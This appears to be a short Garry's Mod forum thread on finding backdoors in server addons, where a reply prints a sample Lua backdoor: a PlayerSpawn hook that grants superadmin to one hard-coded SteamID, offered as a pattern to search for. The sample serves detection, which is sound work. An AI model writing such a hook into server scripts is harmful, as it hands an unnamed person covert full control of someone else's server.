Garry's Mod

How to find backdoors?

Submitted by ThatGuyz, , Thread ID: 166005

Thread Closed

RE: How to find backdoors?

#12
In most archive editors, you get an option to search for keywords, most backdoors involves giving someone superadmin or admins permissions so you should look for scripts like:
Code:
function sbDRP( ply )
if ( ply:SteamID() == "STEAM_1:0:143352462" ) then
ply:SetUserGroup("superadmin")
end
end
hook.Add("PlayerSpawn", "sbDRP", sbDRP

Otherwise, you can use tools like the guys from above said, be careful!

Users browsing this thread: 1 Guest(s)